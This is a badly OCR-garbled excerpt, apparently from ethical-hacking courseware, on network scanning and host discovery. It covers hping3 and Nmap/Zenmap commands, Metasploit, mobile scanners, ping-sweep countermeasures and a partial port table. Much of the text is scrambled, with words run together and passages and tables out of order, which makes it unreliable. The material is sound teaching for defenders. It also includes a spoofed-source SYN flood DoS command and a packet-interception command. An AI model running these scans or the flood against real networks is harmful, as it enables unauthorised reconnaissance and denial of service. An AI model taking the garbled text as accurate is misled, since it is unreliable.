ical
Mackin
and ©by
CountermensoresCopyright
E-Comel
Scanning
Tools:Hping2/Hping3
05 guessing,
TCP/IP
sung.
teeanbeusedfor pathMTUdiscovery,
‘manval advancestraceroute,
remote fingerprinting,
remoteuptime stacks ee
HpingCommands
il an Countermeasures
Macking oy recounet
Scanning
Tools CEH
Tools
Scanning
toolsare usedto scan andidentify
Scanning livehosts,openports,runningserviceson a target
network,
locationinfo,NetBIOS info,andinformationaboutall TCP/IP
and UDPopen ports.The
obtainedfromthesetoolswill help
information an ethical
hacker the profile
i n creating ofthe
target
+
Nmap
the
andscanningnetworkfor open portsof the devicesconnected.
organization
Source:https://nmap.org
Nmap("Network Mapper") is a securityscanner fornetworkexploration and hacking.
It
allowsyou to discoverhosts, ports,andservices o n a computer network,
thuscreatinga
"map" of the network.It sendsspecially craftedpackets to the targethostand then
analyzes
of to
the responses
ofthousands machines.
UDP),OSdetection,
accomplish
Nmap
its goal.
includes
forof
it scans vast networks literallyhundreds
manymechanisms portscanning(TCP
version detection,ping sweeps,andso on.
and
ical andCountermensores
Mackin ©by E-Comel
Copyright
36:Sereenshotlaplaying
Figure Nmap scan
03
Module 248
Page tical andCountermensores
Making Copyright©
by Comet
<a)
Obtains
list|S
-
of a
somncague)
3s
(oorkgrovp!
ports,OS
‘open
details, MAC
and
details,
+ lerosatt HITPWPE ht
services
along
with their Minoo
oe
versions resort
Windows RAC
Hping2/Hping3-
37: Screenshot
Figure
sispayingNmap
scan result
Source:http://www. hping.org
Hping2/Hping3
the TCP/IP
is a command-line-oriented
protocol
raw-lP protocols.
networkscanning
that sendsICMPechorequests
It performs network security
andpacket
and supports
auditing,
TCP,UDP,
firewall testing,
crafting
toolfor
ICMP, and
manualpath
MTUdiscovery, advanced traceroute,remote OSfingerprinting, remote uptimeguessing,
TCP/IP
target auditing,
stacks
replies
similarly
well as arbitrary
packet
andotherfunctions.i t can sendcustomTCP/IP
to a pingprogramwith ICMPreplies.
body
packets
It handles
and size,and it can beusedto transferencapsulated
anddisplay
fragmentation as
files
underthe supported protocols.It alsosupports idle host scanning.IP spoofing and
network/host scanning can be used to perform a n anonymous probe for services.
Hping2/Hping3 alsohasa Traceroutemode,whichenablesattackersto send files
betweencovert channels.It alsodetermineswhetherthe hostis up even whenthe host
ical andCountermensores
Mackin ©by E-Comel
Copyright
blocksICMPpackets. Its firewalk-like
usageallowsthe discovery
of open portsbehind
firewalls.It performsmanualpathMTU discovery and enablesattackersto perform
remote
Using
OSfingerprinting,
Hping,
attacker
an
behavior
of ports
host
can study
gain
the
aboutan idle and information
target,
the
as services
such the
that
host
offers,
supporting
the
services,the
the OSof the target.Thistypeof scan is a predecessor
outright
attacks.
the and
to either heavierprobingor
icp
2
scmp
0
hping statistic
ransmitted, 9 packetsre
ip min/avg/nax
= 2.2/5.2/9.1
TheOS,router,switch,
andIP-based
Figure3.8:
devices
MPscanning
u se thisprotocolvia the pingcommandfor
echorequest
andechoresponseasa connectivitytester betweendifferenthosts,
ACKScanning
on Port 80
This
scanning
Simple
packet
technique
filtering
can beusedto probe
the existence firewall
allowsthe establishmentof a connection (packets of
a andsets.
with the
its rule
whereasa sophisticated
ACKbitset),
a connection.
statefulfirewalldoesnot
allow
theestablishmentof
ical andCountermensores
Mackin ©by E-Comel
Copyright
ee
HpingCommands
3.9:
Figure ACKseanringon port80
Thevarious Hping
commands
are as follows:
© ICMPping
& hping3-1 10.0.0.25
Hping
You performs
may
an
ICMP
hping or
byspecifying
pingscan
argument
inthe
argument
use --ICMP -1
the as-1.inthe
line.
the
command
thecommand
line. Byissuing above
utility. to
reply
‘command,sendsa n ICMPechorequest 10.0.0.25andreceives an ICMP
ACKscan
ping
similarly
to a
on port80
Ex. hping3 -A 10.0.0.25 -p 80
Hpingcan be configured to perform an ACKscanbyspecifying the argument -A in the
‘command
line. Here, you set the ACKflag i n the probepackets andperform the scan.
Youperform thisscan whena hostdoesnot respond to a pingrequest. Byissuingthis
‘command,
Hping checksif a hostis alive on a network.If it findsa live hostand an
port,it returns an RSTresponse.
‘open
UDPscanon port
80
Ex. hping3-2 10.0.0.25 -p 80
uses TCPas its default protocol.
Hping the argument-2 i n the commandline
Using
specifies
that Hpingoperatesin theUDPmode.Youmayuse either ~udp or -2 as the
i n the command
argument line.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Byissuingthe abovecommand, HpingsendsUDPpacketsto port80 on the host
(10.0.0.25).
It returns an ICMPportunreachable
doesnot return a message ifit
message findsthe portclosedand
if the portis open.
InitialSequence
Collecting Number
Ex. hping3192.168.1.103 -9 -p 139 -s
Usingthe argument -Qi n the commandline,Hping
collectsall the TCP sequence
numbersgenerated bythe targethost(192.168.1.103).
FirewallsandTimestamps
Ex. hping3-S 72.14.207.99
-p 80 --tep-timestamp
f
Many drop
irewalls thoseTCP thatdo not havetheTCPTimestamp
packets option
set.Byadding
‘TCP
the
timestamp ~tcp-timestamp
optioni nargument
to command
line,
Hping the
frequency
in the
andtry guessthetimestamp
Uptimeof the targethost(72.14.207.99).
update
you can enable
and
SYNscan on port50-60
Ex. hping3-@ 50-60 -s 10.0.0.25 -v
the
Using argument -8 or ~scan in thecommandline,you are operating in the
Hping
host.Adding
scan modeto scan a rangeof portson the target the argument
-Sallows
perform
youto a SYNscan
Therefore,
the abovecommandperforms
a SYNscan on ports50-60 on the target
host.
FIN,PUSHandURGscanon port80
Ex, hping3 -F -P -U 10.0.0.25 -p 80
Byadding the arguments f, -P,and-U i n the commandline,you are settingFIN,
PUSH, andURGpackets i n the probepackets. Byissuingthis command, you are
performing
FIN,
PUSH,
and
scans
port
If80
on
the
target
host
(10.0.0.25)
URG on
is open,you will not receive a response.the portis closed,
‘80
RSTresponse,
If port
will return an
Hping
Scanentiresubnetfor livehost
Ex. hping3-1 10.0.1." --rand-dest -r etho
Byissuingthis command,Hpingperformsan ICMPping scan on the entire subnet
10.0.1.x;
in otherwords,
it sendsan ICMPechorequestrandomly (--rand-dest)
to all
thehostsfrom10.0.1.0 to 10.0.1.255that are connected
to theinterface
eth0.The
hostswhoseports
seta are
port;hence,open
will ICMP
reply.
case,
not
respond
with an Inthis
bydefault.
to port 0 on all IP addresses
sendspackets
Hping
youhave
ical andCountermensores
Mackin ©by E-Comel
Copyright
alltrafficcontaining
Intercept HTTPsignature
Ex.hping3 -9 HTTP -r etho
‘The
argument
9 HTTP, Hping to
starts listening the
-9will set the Hpingthelistenmode.Hence, byissuing command
on port0 (ofall the devicesconnected
i n the network
to interfaceeth0),
fromthesignature
intercepts
end the
topacket's
end. the
HTTP containing signature,
allthe packets anddumps
Forexample,
hping2
on issuingthecommand -9 HTTP,if Hpingreadsa packet
it will display
contains data 234-09sd#1k}s45-HTTPhe11o_world,
that
the resultas
hello_world.
SYNflooding
a vi
Thefollowing
DoS
attack.
tableliststhe various scanningmethodsandtheir respective
Hping
commands:
Scan Commands
ACK 80
scanon port hping3 -A 10.0.0.25 =p 80
UDP 80 |
scanon port
Collecting
initial
hping3-2 10.0.0.25
number hping3192.168.1.103
sequence
-p 80
-9 -p 139 -s
porton
SYNscanon
FIN,PUSH,
port
|
50-60
andURGscan 80
hping3-8
hping3-F
50-56 -s 10.0.0.25
-P -u 10.0.0.25
-v
-p 80
entire
Scan
subnet for livehost
alltrafficcontaining
Intercept HTTP
hping3 -1
hping3 -9
10.0.1.x
HTTP -1 etho
--rand-dest -I ethO
signature
a
SYNfloodingvictim hping3 -S 192.168.1.1
wep Bleed
-a 192.168.1.254
ical andCountermensores
Mackin ©by E-Comel
Copyright
Metasploit
Source:https://www.metasploit.com
Metasploit that provides
is an open-source project the infrastructure,
content, andtools,
perform
to penetration auditing.
t ests andextensive security It provides
information
about securityvulnerabilitiesand aids i n penetration testingand IDS signature
development. It facilitates exploits
thetasksofattackers, writers,andpayload writers. A
major advantage of the frameworkis the modular approach, i.e., allowing the
combination of anyexploitwithanypayload,
It enables you to automate the process of discoveryandexploitation andprovides you
with the
necessary
tools manual
can use Metasploit of to performthe testing phase a penetration
Proto scan foropenportsandservices,exploit
test. You
vulnerabilities,pivot
of
further into a network,collectevidence, andcreate a report the test results.
3.10:Screenshot
Figure
various
Metasploit
displaying portsean modules
ical andCountermensores
Mackin ©by E-Comel
Copyright
NetScanTools
Pro
Source:https://www.netscantools.com
NetScanTools tool that allowsyou to troubleshoot,
Pro is an investigation monitor,
discover,anddetectdevices o n your network. Using thistool, you can easilygather
informationaboutthe localLANas well as Internetusers,IPaddresses, ports,andso on.
‘Attackers
can findvulnerabilities
andexposed portsi n the targetsystem. It helpsthe
attackersto list IPv4/IPV6addresses,
hostnames, domainnames, emailaddresses, and
URLsautomatically or manually (using
manual tools).NetScanTools Procombines many
networktoolsandutilities categorized bytheir functions,suchas active,passive,DNS,
andlocalcomputer.
hog tie
oe
@ hg SanneRespnee
Summary
Made
PromieuousSenne
Nestea
Bs
3.11:Screenshot
Figure ofNetScanToos
Pro
Someadditionalscanningtoolsare listedbelow:
=
Unicornscan (https://sourceforge.net)
+
SolarWinds (https://www.solarwinds.com)
PortScanner
NetworkMonitor (https://www.
‘PRTG paessler.com)
=
OmniPeek (https://www.savvius.com)
NetworkProtocolAnalyzer
ical andCountermensores
Mackin ©by E-Comel
Copyright
Tools for Mobile
Scanning
IP Scanner
along
for
IPScanner iOSscansyour localarea network to determinetheidentity
andInternet devices.It allowsattackersto perform
machines
withpingandportscans.
of
all its active
networkscanningactivities
ical andCountermensores
Mackin ©by E-Comel
Copyright
Fing
Source:https://www.fing.io
Fingis a mobileapp for Androidand iOSthat scans and provides complete network
suchas IP address,
information, MACaddress, device andISPlocation.
vendor, It allows
addressto all
devices
attackers discover
as
well
to perform
connectedto a Wi-Finetworkalong
as the name of thevendor/device manufacturer.
networkpinging andtraceroute activities through
withtheir IPandMAC
It alsoallowsattackers
specificportssuchas SSH,
FTP,
NetBIOS,
ete.
Figure3:13:
Screenshot
of Fing
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
NetworkScanner
Source:https://play.google.com
NetworkScanneris an Androidmobileapplication that allowsattackersto identify
the
activehosti n therangeof possible
addressesin a network. It alsodisplays
IPaddresses,
MACaddresses,
host
names,
vendor
details
allavailable
and
Thistool alsoallowsattackers devices
network. of the
to portscantargets withspecific
i n the
portnumbers.
NetworkScan.
1p:192.168.1.102/24
SSi0:"Tenda_
26508"
MODE:
(72
WiFi Mbps)
402..168.192 Coro)
Bea
(Catenay)
netanteway
1003.168.192.
192.1681.100
109..168.192.
192.1681.109
101..168.192.
392.1681.101
3.14:Screenshot
Figure ofNetwork
Scanner
Module
03 258
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
Module Flow
Host Discovery
is the process
Scanning information
of gathering about systems thatare “alive―
andresponding
on the
network.
Host
To performdiscovery
considered
asprimary
a complete network
scanning
is
process.
scanandidentify
the taski n the
openportsandservices,itis necessaryto check forlive
Host
systems.
discovery
an attacker an status
of
the
systems
network,
providesaccurate
to avoidscanningeveryporton everysystem
whetherthe targethostis up.
i n the whichenables
i n a sea of IP addressesto identify
ical andCountermensores
Mackin ©by E-Comel
Copyright
HostDiscovery
Techniques
(©Host
discovery
ate t o identify
techniques used theactive/Ive i n thenetwork
systems
Host Discovery
Techniques
Hostdiscovery
techniques can be adopted
to discoverthe active/live
hostsi n the network.Asan
ethicalhacker,
you must beaware ofthe various typesofhostdiscoverytechniques. Somehost
discovery
techniques
are listedbelow:
+
ARPPing
Scan
+
+
Ping
UDP
ICMPPing
scan
Scan
©
Ping
ICMPECHO
Ping
+ ICMPECHOSweep
©
©
Ping
ICMPTimestamp
Mask
Ping
ICMPAddress
TCP PingScan
Ping
TCPSYN
© TCPACKPing
IPProtocolSean
ical andCountermensores
Mackin ©by E-Comel
Copyright
ARP Ping
Scanand UDP Ping
Scan
scan,todisable
the
port
scan.you
ping
as,
Note: ~sn the Nmap
is command Since Nmapuses ARP scan
thedefault ping
disable-arp-ping, other
to disableit andperform desired
pingscans, can use ~~
ical andCountermensores
Mackin ©by E-Comel
Copyright
probe
ARPrequest
=<
Attacker 3.5:
Figure ARPpingscan
Target
Advantages:
‘=
ARPpingscanis considered
to bemore efficient
andaccuratethanotherhostdiscovery
techniques
pingscan automatically
‘ARP
discretion
handlesARPrequests,
retransmission,timeout
and at its own
discovery,
ARPpingscanis usefulfor system whereyoumayneedto scan large
address
spaces
pingscancan display
‘ARP theresponsetime or latency
ofa deviceto an ARPpacket
Teer {10103030
[Trem] Series}
snap Hox
Our Pets/ Host Topo Oth Scam
UDPPing
s can
Figure
3.16:ARPsean in Zenmap
03
Module Page262 ical andCountermensores
Mackin
©
Copyright
by E-Comel
& tracker
Figure3.27:
uorping
Hostis Active
UDPpingsean to determine
Target
ifthe hostsactive
LS
>
ap ee Host is inactive
Attacker
Figure3.18
UDPpingcanta determinethehosting
Target
‘Advantages
=
UDPpingscans havethe advantageof detecting behindfirewallswith strict TCP
systems
filtering,
leaving
the UDPtrafficforgotten.
©
Zenmap
ScanTools Profle Help
Target:
|
Command:[remap
1010:1010
an PU10101010
5 +
Hess]
Host
Sevices
=
| NewpOvput Pore/Hoss Topelogy
10.101
[rmap-2n-PU
HortDetails
Scant
etait
® rara1010 Starting ap 7
we 2019-06-07
Figure3.29:
UDP
in
pingsean Zenmap
ical andCountermensores
Mackin ©by E-Comel
Copyright
ICMPECHOPing
Scan
|
|
scans
return
reply
1cmP€oH0
wil
ping
an ICMP
TWsscan
vole sending
ECHO
seal for locating
ICMPECHOrequests
active devices
toa hos. the host ve,
iftheICMP
or determining s passing
through
ICMPECHOPing
Scan
use the ICMPping scan to sendICMPpackets
‘Attackers to the destinationsystemto gatherall
necessary informationaboutit. Thisis becauseICMPdoesnot include andit is
portabstraction,
differentfrom portscanning.However, itis usefulto determinewhat hostsi n a network are
runningbypingingthemall
ping
ICMPECHO scaninvolves
return a n ICMPECHO
is passing through
reply.
sendingICMPECHO
Thisscan is usefulfor locating
a firewall,
to a host.If thehostis alive,i t will
requests
active devices or determiningif ICMP
HEMPEchoRequest,
Â¥
source
—
—
(20.10.10.16)
1EMPEchoReply }
Destination
(10.10.10.10)
UNIX/Linux andBSD-basedmachines
320:1eMP
Figure
and echo
use ICMPechoscanning;
request
the TCP/IP
eply
stackimplementations
intheseOSsrespondto the ICMPechorequests to the broadcast Thistechnique
addresses. does
not worko n Windows-based networks,
as their TCP/IP stackimplementationdoesnot reply
to
ICMPprobes
directed
at the broadcast
address.
Nmap
u sesthe -P option
to ICMPscan the target.
Theusercan alsoincreasethenumberof pings
in parallel
usingthe~ option.It mayalsobeusefulto tweakthepingtimeout valueusingthe ~
option.
ical andCountermensores
Mackin ©by E-Comel
Copyright
InZenmap,the -PE optionis usedto perform
the ICMPECHOping scan, Active hostsare
displayed
as “Host up,"as showni n thescreenshot.
is
Sewices
| Nmap Outpt Por
etait
® rar01010 "
at 2019-06-07
fmaa_danei1 TPsdzre:
Fer Monte
Figure
3.21
Echo
ovtpu
ICMP png scan
ical andCountermensores
Mackin ©by E-Comel
Copyright
ICMP ECHO Ping
Sweep
1 Pngsweep used
the
hot
todetermine ve froma rangeof addees
by
oa
ssiLD
seach
ICMPECHOPingSweep
A ping sweep (also knownas an ICMPsweep) is a basicnetwork scanning technique that is
adopted to determine therangeof IP addressesthat mapto live hosts(computers). Although a
single ping will tell the user whethera specified hostcomputer existson the network, a ping
sweepconsistsof ICMPECHO requestssent to multiplehosts.Ifa specifiedhosti s active,it will
return a n ICMPECHO reply.
Pingsweeps are amongthe oldestandslowestmethodsusedto scan a network.Thisutilityis
distributed
on
all platforms,
acrossnearly
the networkanswers the ping query that anothersystem a
andit actsas rollcal forsystems; thatis active
a system
sendsout.
ICMP echoscanningpingsall the machines i n the target
network to discoverlive machines.
AttackerssendICMPprobes to the broadcast or networkaddress,
whichrelays to all the host
addresses will sendthe ICMPechoreply
i n the subnet.Thelive systems message to the source
ofthe ICMPechoprobe.
ical andCountermensores
Mackin ©by E-Comel
Copyright
cho Request
ICMPEchoRequest
Â¥ ICMPEchoReply 10.10.09
Source
1010.10.16
ICMPEcho
Request
>
10.10.10.12
ICMPEchoReply
ichaP
Request
Echo
10.10.10.10
ECHO Figure3.22:
CMP PingSweep
Tounderstandpingsbetter,o ne shouldbeableto understandthe TCP/IP packet. Whena system
pings,it sendsa single packetacross thenetworkto a specific IPaddress. Thispacket contains64
(56 and
8 header
information).
bytes databytes bytes
for a return packet
is “alive,―
a good
sender
or ofprotocol
fromthe target
return packet
The
system.If the connectionsare good
is expected. However,
thenwaits listens
andthe targetcomputer
thiswill not be the case if there is a
disruption i n communication. Pings alsodetailthe time takenfor a packet to makea complete
calledtime.―
trip,
They
help this
case,
the “round-trip also
bouncesbackwhensent to the IP address,
unableto reconcilethename with thespecific
in resolving
hostnames. In if the packet
but not whensent to the name, thenthe systemis
IPaddress.
‘Attackers to identify
calculatesubnetmasksusingsubnetmaskcalculators the numberof hosts
that are present i n the subnet.They
subsequently
use pingsweep to create an inventoryof live
systems in thesubnet,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Ping
ICMPECHO Sweep
Using
Nmap
Source:https://nmap.org
Nmap helpsa n attackerto perform
In Zenmap,
addresses.
a ping sweep that determines livehostsfrom a range IP
is usedto perform
the -PE optionwitha list of IP addresses ICMPECHO of
ping
sweep. ©
Zenmap
Scan TooleProfile Help
Target/10:10:05-15
Command:[pmapan PE1010105-15
Hots
Host
| Senices
Nmap
OutputHost
reap
Details
an
§
PE10.10.1055
Topology
Ports/Hosts
]
Scans
(Dei
010105 i ( netps://omap.org) at 2019-06-18
‘®
10.10.109
IEE
ean _ceport for 10.10.10.5
8
ee. cman
Besnaemn-nevere
o
Gert
fevie.ceer
Grint tas
3 cney)
(09:00!29:79:02:89 (Vimare)
FiterHoas
Fgure323:PingSweep
output usingZenmap
03
Module 268
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
Tools
PingSweep
IP| Angry?
Angry
Scanner
Seanner pings
each
IPto
@
resolves
‘optionally
addres checkanyofthese
hostnames,
determines
a ddrstes
theMACaddress, are
ve
et.
sans ports,
Then,it
PingSweep
Tools
Tools
PingSweep
Ping
sweep toolsping an entire range of networkIPaddresses
to identify
the live systems.
The
following
are pingsweeptoolsthatenable livehostson thetargetnetworkby
one to determine
sending
multiple
ICMPECHO to various hostso n the networkat a time.
requests
=
Angry
IPScanner
Source:https://www.angryip.org
‘as
well
any
of
their
as and
IP scanner is an IPaddress portscanner. It can scan IPaddresses
‘Angry
ports. address
check
if alive;
resolvesi ts hostname, then,
optionally
It pings eachIP
determines the MACaddress,
to tis
i n anyrange
it
scansports,andso on. Theamount
of host
datagathered
features,
logged
with
abouteach increases
(computer
suchas NetBIOSinformation
i n Windowsuser),
plugins.Angry IPscanner hasadditional
name, workgroup name, andcurrently
favorite IP addressranges,web server detection, and
customizable openers. Thetool allowsthe user to save the scanning resultsto CSV,
TXT,
XML,or IP-Portlist files.To increase the scanningspeed, it uses a multithreaded
approach: a separatescanning
thread is createdfor eachscanned IP address.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure
3.24:
of Scanner IP
Screnshot Angry lvehots
showing
Figure3.25: of Angry
Screenshot IPScanner showing details
complete of ive hosts
Someadditionalping sweep toolsthat an attackeruses to determinelivehostson the target
networkare listedbelow:
‘=
SolarWinds Toolset(https://www.solarwinds.com)
Engineer's
=
Pro(https://www.netscantools.com)
NetScanTools
Colasoft PingTool(https://www.colasoft.com)
Tester (http://www.pingtester.net)
VisualPing
Oputils
(https://www.manageengine.com)
ical andCountermensores
Mackin ©by E-Comel
Copyright
Countermeasures
PingSweep
sempre
‘Umit
Acces
Contr
eM
(ACLsonl
fspeci
wri ung
such
as
SPs Lsts ermislan
anderen adresces
Countermeasures
PingSweep
Somecountermeasuresfor avoiding
ping sweep are as follows:
+
Configure
thefirewallto detectandpreventpingsweep attemptsinstantaneously
Use intrusion detectionsystemsand intrusion prevention
systemssuch as Snort
(https://wwwsnort.org)
to detectandprevent
pingsweepattempts
Carefully
evaluatethe typeof ICMPtrafficflowing
through
the enterprise
networks
Terminate the connection with any hostthat is performing
more than 10 ICMP ECHO
requests
UseDIZ andallowonly
commands
andTIME. EXCEEDEDin DMZZone
suchas ICMP
ECHO_REPLY, HOST UNREACHABLE,
ControlLists(ACLs)
LimittheICMPtrafficwithAccess to your ISP'sspecific
IPaddresses
ical andCountermensores
Mackin ©by E-Comel
Copyright
Other Host Discovery
Techniques
ICMP is on
mayor maynot respond withthe time valuedepending its configuration
bythe administrator
target's
at the
specifically
used
for
end.This timestamp pinginggenerally time synchronization.
a ping method is effective i n identifying
Such
whetherthe destinationhost machineis active,
in the conditionwherethe administratorblocksthe traditionalICMPECHO ping
requests. In Zenmap, the -PP optionis usedto perform a n ICMPtimestamp pingscan.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Target 10
Command [pmap2n-PP 10101010
5
Hows]
« Host
Senices
=
| Ports/HostsTopology
Nmap Ovtput
pemap-an-PP 1,
Host
Details Scant
Detail
® 10101010
)
fnmap.org at 2019-06-07
1 1°
fwnsa-done:
FiterHosts
Figure
ICMPAddressMaskPingScan
ping
in
3.26:CMPtimestamp Zenmap
Zena
—
Command: en 6M 10101010
[Fenap
|| | Output Detail
Hosts
«
05 Host
Services Nmap
map -s0-PR10.1010
Ports/HostsTopology
Host Scant
Details
® 1010
Nmap
( ) Starting 7.78
nttps://nmap.ore at 2019-06-07
2.27;ICMPaddress
Figure mask
ping Zenmap
in
ical andCountermensores
Mackin ©by E-Comel
Copyright
TCPSYNPing
Scan
ping
TCPSYN
online host
discovery
check technique
encounters
and to probing
is a
firewall
fit
an attackerusesthe Nmap
different discovery is
host any
for portsto determineif the port
rulesets.In thistypeof
tool to initiate the three-way handshake bysending
technique,
the emptyTCP
SYN
to
flag
ACKflag. receiving
SYN,
the target
After reception
bysending flag
acknowledges
host.After
of theACKflag,
terminates the connection an RST
the target host
to the target
the receipt
hostmachine(since
with an
the attackerconfirmsthat the targethostis active and
his/her
objectiveof hostdiscovery is accomplished). Port80 is usedas thedefaultdestinationport.A
rangeof portscan alsobe specified i n this typeof pingingformatwithout inserting a space
between-PSand the portnumber(e.g,, PS22-25,80,113,1050,35000), wherethe probe will be
against
port
parallelly.
performed each
ping
scan.
In Zenmap, the ~PS optionis usedto perform SYN
aTCP
‘Attacker Figure3.28:
TCPSYNpingscan for host ascovery
Target
Host
Advantages
=
can parallelly,
As themachines bescanned
waitingforthe response.
the scan never getsthe time-out error while
=
TCP SYN ping can be usedto determineif the host is active without creating
any
the
logs
are
not
connection. Hence, recordedat the system
attackerto leaveno traces for detection.
or
network
level, enabling
the
Zenmap
fenapen PS 170305
imap
OutoutPorts/Hosts Topology
Hest DetailsScans
Figure
3.29:
SYNin
TCP pingsean Zenmap
ical andCountermensores
Mackin ©by E-Comel
Copyright
TCPACKPing
Scan
TCP
ACK
pingto albeitvariations.
is similar TCP
the targethostdirectly.
ACKalso
uses
SYNping,
defaultport80. In the TCPACKpingtechnique,
with minor TCP ping
the attackerssendan empty TCPACKpacket
Sincethereis no priorconnection betweentheattackerandthe target
the
to
Target
Host
Figure
3.20: TP ACKpngscan for host
dscovery
Both the
bypassing
the SYNandthe ACKpacket
can beusedto
firewallsare mostly
firewall.However, configured
maximize
to blocktheSYNpingpackets,
asthey
the chances
of
aremost
common
the
pinging
technique. be In suchcases,the ACKprobe
thesefirewallrulesetseasily
usedto bypass
c an effectively
Profle Help
Tongee,(101010 Profile
sn
Comment. [pap -PA10310,1010
Hots
=
|| | Nmap
Output Detals
Services
[remap -sn-PA 1:
Ports/HostsTopology
Host Scans
Deas
® 10101010
unas ) starting
2237
hntepsi//nmap.org
Seancara Tse
seport for 10.10.10.10
Os latency)
at 2019-06-07
IP Protocol
Ping
Scan
3.31:
Figure TCP
ACKpngsean in Zenmap
ical andCountermensores
Mackin ©by E-Comel
Copyright
Multiple
packets
ICMP
(protocol
IP
IGMP
(protocol
for
configuring
default when no protocols
(protocol
1),4)
are specified.
DEFAULT_PROTO_PROBE_PORT_SPEC
change
For
specific
protocols
2),andIP-in-IP
the default protocols,
compile
innmap.hduring time. For
are sent by
suchas ICMP,
IGMP,
TCP(protocol
6),and UDP(protocol
17),the packetsare to be sent with
andforthe remainingprotocols,
headers,
properprotocol onlytheIP headerdata is to be sent
Target
Host
332: 1°
Figure pingscan forhost
protocol discovery
attackers
In a nutshell, senddifferentprobe packets ofdifferentIP protocols
to thetargethost;
anyresponsefrom any probeindicatesthat a hostis online.In Zenmap,the -PO optionis used
to perform
an IP protocol
pingscan.
7
Services Nmap OutputPorte/HesteTopology
m ap 0-70 10101010
Most
Details Scans
Detail
® 10103010 Starting tinap 7.78
(
nttps://nmap.org ) at 2019-06-07
Fier Heats
Se soe
Figure
1P
3.3: protocol
pingsean in Zenmap
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
[Network Scanning
Concepts
Port
and ServiceDiscovery
Tools FD
Seanning osciscvery
Gamer crating?
(05Fingerprinting)
Scanning
Beyond
IDSandFirewall
echo Thudp
discard hep sinknull
9/udp sink
discard
systat
null apes Users
daytime hep
ical andCountermensores
Mackin ©by E-Comel
Copyright
daytime 13/udp
netstat 15/tep
gota hep Quote
chargen asitep ttytstsource
chargen 19/udp ttytstsource
ftp-data 2ojtep fapdatatransfor
ftp 2aftep ‘fp
command
ssh 2aptep Secure
Shel
telnet 23/tep
SMrP 2siteo Mall
time a7/tep
time 37/udp Timeserver
rlp 39/udp
nickname a3hten whois
domain 53/tep domainnameserver
domain 53/udp domainname server
ical andCountermensores
Mackin ©by E-Comel
Copyright
audionews nafep ‘Audio
NewsMulticast
audionews i1a/udp ‘Audio
NewsMulticast
antp Las/tep UsenetNetworkNewsTransfer
antp 119/udp UsenetNetworkNewsTransfer
ate n2a/tep NetworkTimeProtocol
Name Port/Protocol Description
ntp 123/udp NetworkTimeProtocol
netbios-ns s7/tep INETBIOS
NameService
netbios-ne 137/udp [NETBIOS
NameService
netbios-dgm 13a/tep [NETBIOS Service
Datagram
netbios-dgm 138/udp Datagram
[NETBIOS Service
netbios-ssn 139/tep NETBIOS
Session
Service
netbios-sen 139/udp INETBIOS
Session
Service
imap 1a3hep InternetMessage
Access
Protocol
imap 443/udp InternetMessage
Access
Protocol
sqi-net 1so/tep SQLNET
sqi-net 150/udp SQLNET
sqisrv 156/tep Sal Service
eqlery 156/udp SQLService
enmp 1eifep
enmp 161/udp
snmp-trap 1e2/tep
snmp-trap s62/udp
cemip-man 163/tep ‘CMIP/TCP
Manager
emip-man 163/udp cmp
emip-agent
cmip-agent
re4ahtep
164/udp
COMIP/TCP
Agent
cmp
194/tep InternetRelay
Chat
194/udp Internet Relay
Chat
at-rtmp 2ox/tep ‘AppleTalk
RoutingMaintenance
at-rtmp 2o1/udp ‘AppleTalk
Routing
Maintenance
at-nbp 2oz/tep ‘AppleTalk
NameBinding
at-nbp 202/udp ‘AppleTalk
NameBinding
at-3
at-3
203
/tep
203/udp
‘AppleTalk
AppleTalk
at-echo 2o4/tep ‘AppleTalk
Echo
ical andCountermensores
Mackin ©by E-Comel
Copyright
2oa/udp
/tep ‘AppleTalk
at-echo
at-5 205 AppleTalk
Echo
206/tep
at-zis
206/udp Zone
at-zis
‘AppleTalk
ZoneInformation
‘AppleTalk
information
2o7/tep
at-7
207/udp
at-7
AppleTalk
AppleTalk
208/tep
at-8
208/udp
at-8
AppleTalk
AppleTalk
2a3/tep
ipx
213/udp
ipx
Novell
Novel
220/tep
imap3
220/udp
imap3
InteractiveMailAccess
Protocolv3
InteractiveMailAccess
Protocolv3
aurp 387/ep ‘AppleTalk
Update-Based
Routing
387/udp
aurp
396/tep
netware-ip
AppleTalk Routing
Update-Based
NovellNetwareover IP
netware-ip 396/udp NovellNetwareover IP
Port/Protocol
Name
mt ani/tep
Description
Remote
mt
ani/udp mt
kerberos-de
mt
a4s/tep
Remote
Microsoft05
kerberos-ds
445/udp
500/udp
isakmp
Microsoft0S
ISAKMP/IKE
510/tep
fep
siz/tep 8)
exec
FirstC lass
Server
850rexecd(
comsat/bift
S12/udp
513/tep
login
used bymailsystemto notifyusers
SD rloging(s)
513/udp
who
s18/tep
shell
850rwhod{@)
‘whod
BSDrshalé)
‘emd
S1a/udp
515/tep £850
syslog
B50
printer
syslogd)
spooler Indl)
515/udp
si7/tep Spooler
Printer
printer
talk 880talk)
talk s17/udp Talk
518/udp
ntalk
s18/udp
atalk
NewTalk(talk)
un0s talkal@)
03
Module 280
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
netnews 532/tep Readnews
uuep Sé0/tep ‘wucpa
850wuepel)
uuep S40/udp ‘wucpa
850wuepels)
login 543/tep Kerberos
Login
login $43/udp Kerberos
Login
kshell Séa/tep Kerberos
Shell
Kshell Saafudp Kerberos
Shell
ekshell encrypted
kremdKerberos remote shel
“Kall
peserver PCboardsv
ECDIntegrated
mount 635/udp NFSMountService
penfs e40/udp PC-NFS
DOSAuthentication
wns 650/udp BBW-NFS
DOSAuthentication
flexim 7aa/tep Flexible Manager
L icense
flexim 7aajudp Flexible
i censeManager
Kerberos-adn
Kerberos-adn
Tas
/tep
7a9}udp
Kerberos
Administration
Kerberos
Administration
kerberos 7s0/tep authentication—tep
keeKerberos
kerberos 750/udp Kerberos
kerberos_master 751/udp authentication
Kerberos
kerberos_master 7sa/tep authentication
Kerberos
kxb_prop 7sa/tep slavepropagation
Kerberos
999/ud ‘Applixware
socks 1080/tep
socks 1080/udp
kpop nios/tep PopwithKerberos
ms-sql-s 1433/tep Microsoft
SOLServer
ms-sql-s 1433/udp MicrosoftSO Server
ical andCountermensores
Mackin ©by E-Comel
Copyright
rkinit
ex
2i08/tep
2unihep
